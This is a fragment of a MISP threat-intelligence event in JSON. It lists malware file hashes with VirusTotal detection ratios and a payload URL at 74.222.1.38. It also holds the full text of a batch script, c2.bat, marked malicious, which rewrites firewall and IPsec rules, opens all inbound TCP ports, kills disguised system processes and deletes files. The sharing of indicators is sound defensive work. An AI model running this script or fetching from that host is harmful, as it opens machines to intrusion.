"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859151",
|
|
"uuid": "4a5526a0-66ef-4a36-859c-9fae1cf3a73e",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "20fed181-b496-436f-bd07-e34870c1a396",
|
|
"value": "2019-01-14T04:05:17"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "07e4489f-94f7-493f-aa56-c6f95cab3002",
|
|
"value": "https://www.virustotal.com/file/b56a4d9ae623b8eded2c341294363d2bea63c1b7067236c0b1a98292fd0f68a3/analysis/1547438717/"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "b0f1138a-a269-414a-8e73-27d688dac9b2",
|
|
"value": "23/56"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859151",
|
|
"uuid": "5f4ce8ec-cff2-422d-977a-34ef4867b8f6",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "5f4ce8ec-cff2-422d-977a-34ef4867b8f6",
|
|
"referenced_uuid": "ab17e198-674e-4648-8c02-f3c1fcb73d3f",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859153",
|
|
"uuid": "5cea4d91-34f8-4ad2-98d2-4630950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "d1878ddd-4eb6-4dd5-b4fd-5ff37b078154",
|
|
"value": "e1fa5e03ddfe7c81f3f80d88a7162b5f"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "1f71a17c-3ea8-4fa9-a574-31c3d117b724",
|
|
"value": "72bb026e618e317eb231417b573a38d805c7bb00"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "1a3bf3bb-2e62-4896-be9e-2856ed877df9",
|
|
"value": "6d0790b702e1a7897c248f4fbc9a1818c80107fc658b500104eeb3a16c7beaae"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859151",
|
|
"uuid": "ab17e198-674e-4648-8c02-f3c1fcb73d3f",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "last-submission",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "datetime",
|
|
"uuid": "9527b674-741a-4d37-8e0d-5491ca6e906f",
|
|
"value": "2018-11-08T08:34:45"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "permalink",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "3349c61c-757c-4fac-99a6-8ad73aabc00a",
|
|
"value": "https://www.virustotal.com/file/6d0790b702e1a7897c248f4fbc9a1818c80107fc658b500104eeb3a16c7beaae/analysis/1541666085/"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "detection-ratio",
|
|
"timestamp": "1558859117",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "38f5c57b-bb70-4651-91f8-6ee1011f0a12",
|
|
"value": "1/57"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "15",
|
|
"timestamp": "1558859151",
|
|
"uuid": "7ed42a8d-d9f9-40bb-8e6f-4141b08ac14c",
|
|
"ObjectReference": [
|
|
{
|
|
"comment": "",
|
|
"object_uuid": "7ed42a8d-d9f9-40bb-8e6f-4141b08ac14c",
|
|
"referenced_uuid": "e844333b-ee9f-4d2b-8d3a-17a29d6fa3d7",
|
|
"relationship_type": "analysed-with",
|
|
"timestamp": "1558859153",
|
|
"uuid": "5cea4d91-5658-4cc5-8a78-4223950d210f"
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "74bcc5a1-dba2-4afe-9a6e-619e6e2abe96",
|
|
"value": "d515a6b5638ec213be9bd4fe507e0b6b"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha1",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha1",
|
|
"uuid": "9302e0b0-0734-4759-80d2-d7b439fbffdf",
|
|
"value": "014ebb8391edb3fda76789e957ba973b3d97859c"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "sha256",
|
|
"timestamp": "1558859117",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "6f9082f8-7e8a-4d5e-bf30-e21487581856",
|
|
"value": "65f2a0e53c83436ca5cf99b7d5a053ae563791a9f46dc6abd64b36eefbb6814c"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "VirusTotal report",
|
|
"meta-category": "misc",
|
|
"name": "virustotal-report",
|
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
|
"template_version": "2",
|
|
"timestamp": "1558859152",
|
|
"uuid": "e844333b-ee9f-4d2b-8d3a-17a29d6fa3d7",
|
|
"Attribute": [
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
"object_relation": "last-submission",
"timestamp": "1558859117",
"to_ids": false,
"type": "datetime",
"uuid": "d7da733f-47f6-47be-adea-480154741de8",
"value": "2019-03-11T02:04:00"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "permalink",
"timestamp": "1558859117",
"to_ids": false,
"type": "link",
"uuid": "d4dc25cf-fedd-4a44-8065-323f4d48453b",
"value": "https://www.virustotal.com/file/65f2a0e53c83436ca5cf99b7d5a053ae563791a9f46dc6abd64b36eefbb6814c/analysis/1552269840/"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "detection-ratio",
"timestamp": "1558859117",
"to_ids": false,
"type": "text",
"uuid": "1ef30cb7-cba8-43dd-8c9a-544007af1d3a",
"value": "18/56"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "15",
"timestamp": "1558859152",
"uuid": "94b76905-bc8e-4167-9633-b19262f34af8",
"ObjectReference": [
{
"comment": "",
"object_uuid": "94b76905-bc8e-4167-9633-b19262f34af8",
"referenced_uuid": "5c2ed803-b879-4d3c-9d36-583c1fde2562",
"relationship_type": "analysed-with",
"timestamp": "1558859153",
"uuid": "5cea4d91-6b18-4983-8e3c-470a950d210f"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1558859117",
"to_ids": true,
"type": "md5",
"uuid": "eca2ee42-6fdd-4237-a0db-5d505c6d8042",
"value": "6d8960cd6c9ba68a69af812fc1c4741b"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1558859117",
"to_ids": true,
"type": "sha1",
"uuid": "d8b959ac-0182-4392-a031-279a5168e070",
"value": "b59ec01ab58a1fbf49846ad34d0b48445aad3506"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1558859117",
"to_ids": true,
"type": "sha256",
"uuid": "469d4b67-a46f-411c-bd8f-e4fcba853ffc",
"value": "968d23d9120c90d7d28cc1b834029f1d5fd36d93bc1ffb9f260b895333c09f02"
}
]
},
{
"comment": "",
"deleted": false,
"description": "VirusTotal report",
"meta-category": "misc",
"name": "virustotal-report",
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
"template_version": "2",
"timestamp": "1558859152",
"uuid": "5c2ed803-b879-4d3c-9d36-583c1fde2562",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "last-submission",
"timestamp": "1558859117",
"to_ids": false,
"type": "datetime",
"uuid": "4fbf8beb-ae11-4650-b5b7-8d185b468fe7",
"value": "2018-08-30T19:41:06"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "permalink",
"timestamp": "1558859117",
"to_ids": false,
"type": "link",
"uuid": "7d74e6cc-9eee-45bf-8eb4-43ef84cfe88d",
"value": "https://www.virustotal.com/file/968d23d9120c90d7d28cc1b834029f1d5fd36d93bc1ffb9f260b895333c09f02/analysis/1535658066/"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "detection-ratio",
"timestamp": "1558859117",
"to_ids": false,
"type": "text",
"uuid": "83006497-ca2b-4cac-8a39-68999f6b8ed8",
"value": "11/57"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "15",
"timestamp": "1558859152",
"uuid": "3751d8a9-13b3-4049-82ec-9607df7fc404",
"ObjectReference": [
{
"comment": "",
"object_uuid": "3751d8a9-13b3-4049-82ec-9607df7fc404",
"referenced_uuid": "ecfc06ea-0951-451d-8b9a-4aeae8c7f133",
"relationship_type": "analysed-with",
"timestamp": "1558859153",
"uuid": "5cea4d91-ca10-4d9b-96ab-4828950d210f"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1558859117",
"to_ids": true,
"type": "md5",
"uuid": "bcdcdb86-c422-444c-952b-6c603f7ee0d7",
"value": "0383c324c0c99f930c65d4034c22766b"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1558859117",
"to_ids": true,
"type": "sha1",
"uuid": "d5bcdcc8-d76c-43f5-80da-02592d947712",
"value": "a36f5113c764f60d9f48e7f9f7b779007f34bbc0"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1558859117",
"to_ids": true,
"type": "sha256",
"uuid": "8fab5037-f23f-4b27-a0a3-de128ad93ef4",
"value": "58f6572f375d449dcd8af1d131ff627a28583feae1861acadc9ea62669d577da"
}
]
},
{
"comment": "",
"deleted": false,
"description": "VirusTotal report",
"meta-category": "misc",
"name": "virustotal-report",
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
"template_version": "2",
"timestamp": "1558859152",
"uuid": "ecfc06ea-0951-451d-8b9a-4aeae8c7f133",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "last-submission",
"timestamp": "1558859117",
"to_ids": false,
"type": "datetime",
"uuid": "fc3f86ce-b03b-4b8e-94cd-66ce90d55ef4",
"value": "2018-09-22T00:26:43"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "permalink",
"timestamp": "1558859117",
"to_ids": false,
"type": "link",
"uuid": "c1d11cf9-2265-4824-bd54-a19ffaebc658",
"value": "https://www.virustotal.com/file/58f6572f375d449dcd8af1d131ff627a28583feae1861acadc9ea62669d577da/analysis/1537576003/"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "detection-ratio",
"timestamp": "1558859117",
"to_ids": false,
"type": "text",
"uuid": "f137b164-8fed-4b75-a650-b39d099da3a7",
"value": "19/59"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
"meta-category": "misc",
"name": "script",
"template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
"template_version": "3",
"timestamp": "1558859269",
"uuid": "5cea4e05-04c4-4f5f-ba43-4d3f950d210f",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "script",
"timestamp": "1558859270",
"to_ids": false,
"type": "text",
"uuid": "5cea4e06-1154-402d-999e-4397950d210f",
"value": "sc config MpsSvc start= auto&net start MpsSvc\r\nnetsh advfirewall set allprofiles state on\r\nnetsh advfirewall firewall add rule name=\"tcp all\" dir=in protocol=tcp localport=0-65535 action=allow\r\nnetsh advfirewall firewall add rule name=\"deny tcp 445\" dir=in protocol=tcp localport=445 action=block\r\nnetsh advfirewall firewall add rule name=\"deny tcp 139\" dir=in protocol=tcp localport=139 action=block\r\nnetsh advfirewall firewall add rule name=\"tcpall\" dir=out protocol=tcp localport=0-65535 action=allow \r\nnetsh ipsec static add policy name=win\r\nnetsh ipsec static add filterlist name=Allowlist\r\nnetsh ipsec static add filterlist name=denylist\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139\r\nnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445\r\nnetsh ipsec static add filteraction name=Allow action=permit\r\nnetsh ipsec static add filteraction name=deny action=block\r\nnetsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny\r\nnetsh ipsec static set policy name=win assign=y \r\nver | find \"5.1.\" > NUL && sc config SharedAccess start= auto && echo Yes | reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\NetBT\\Parameters /t REG_DWORD /v SMBDeviceEnabled /d 0\r\nattrib -s -h -r %WINDIR%\\systxm1\\*.*&attrib -s -h -r %WINDIR%\\system\\*.*\r\n@Wmic Process Where \"Name='winlogon.exe' And ExecutablePath='%WINDIR%\\system\\winlogon.exe'\" Call Terminate &del %WINDIR%\\system\\winlogon.exe\r\n@Wmic Process Where \"Name='svchost.exe' And ExecutablePath='%WINDIR%\\system\\svchost.exe'\" Call Terminate &del %WINDIR%\\system\\svchost.exe\r\ndel %WINDIR%\\debug\\c2.bat\r\nexit"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "language",
"timestamp": "1558859270",
"to_ids": false,
"type": "text",
"uuid": "5cea4e06-73b0-4d56-9735-4443950d210f",
"value": "Winbatch"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "filename",
"timestamp": "1558859270",
"to_ids": true,
"type": "filename",
"uuid": "5cea4e06-d2c8-4d69-9615-494c950d210f",
"value": "c2.bat"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "state",
"timestamp": "1558859270",
"to_ids": false,
"type": "text",
"uuid": "5cea4e06-6794-4f57-9f62-4db6950d210f",
"value": "Malicious"
}
]
},
{
"comment": "",
"deleted": false,
"description": "URL object describing a URL along with its normalized fields (e.g. extracted using the faup parsing library) and its metadata.",
"meta-category": "network",
"name": "url",
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
"template_version": "7",
"timestamp": "1558859411",
"uuid": "5cea4e93-8834-4dd5-992d-4763950d210f",
"Attribute": [
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "url",
"timestamp": "1558859411",
"to_ids": true,
"type": "url",
"uuid": "5cea4e93-48f4-4deb-9250-4716950d210f",
"value": "http://74.222.1.38:8888/close.bat"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "host",
"timestamp": "1558859411",
"to_ids": true,
"type": "hostname",
"uuid": "5cea4e93-49a4-4c43-bd35-46bf950d210f",
"value": "74.222.1.38"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "port",
"timestamp": "1558859411",
"to_ids": false,
"type": "port",
"uuid": "5cea4e93-43c8-4df8-b1f8-479a950d210f",
"value": "8888"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "resource_path",
"timestamp": "1558859411",
"to_ids": false,
"type": "text",
"uuid": "5cea4e93-5d3c-4230-9493-4b87950d210f",
"value": "close.bat"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "15",
"timestamp": "1558859752",
"uuid": "195d072c-cab6-4370-b8ea-cf509e00959b",
"ObjectReference": [
{
"comment": "",
"object_uuid": "195d072c-cab6-4370-b8ea-cf509e00959b",
"referenced_uuid": "e0949b09-cf58-44f5-9455-d6253e56a131",
"relationship_type": "analysed-with",
"timestamp": "1558859753",
"uuid": "5cea4fe9-7828-44f7-9e41-4071950d210f"
}
],
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1558859694",
"to_ids": true,
"type": "md5",
"uuid": "1b0c47b2-15b3-4593-ae65-9734cb1df50e",
"value": "4d437b5614edcc7d1ee5e4bcf5785ef9"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1558859694",
"to_ids": true,
"type": "sha1",
"uuid": "881abb7f-80fe-4e58-9656-8101a2456e97",
"value": "995bc00abbcde848148c5695c10e38ae6b5a9401"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1558859694",
"to_ids": true,
"type": "sha256",
"uuid": "ca8a295c-0a12-466d-9cbb-fd5bc3bb5b64",
"value": "43b4e78dcc1874dc1422b4dc4d40a4841163891a69d59d7f5a0289616fc83bb5"
}
]
},
{
"comment": "",
"deleted": false,
"description": "VirusTotal report",
"meta-category": "misc",
"name": "virustotal-report",
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
"template_version": "2",
"timestamp": "1558859752",
"uuid": "e0949b09-cf58-44f5-9455-d6253e56a131",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "last-submission",
"timestamp": "1558859694",
"to_ids": false,
"type": "datetime",
"uuid": "1ad77ee7-7031-4210-9b8a-2a44aae36573",
"value": "2019-05-11T06:46:25"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "permalink",
"timestamp": "1558859694",
"to_ids": false,
"type": "link",
"uuid": "cb5a7bf2-2d0d-49c2-9d5f-c050da740604",
"value": "https://www.virustotal.com/file/43b4e78dcc1874dc1422b4dc4d40a4841163891a69d59d7f5a0289616fc83bb5/analysis/1557557185/"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "detection-ratio",
"timestamp": "1558859694",
"to_ids": false,
"type": "text",
"uuid": "e8efebe6-f034-423e-9f89-70ee1b0dcb78",
"value": "5/59"
}
]
}
]
}
}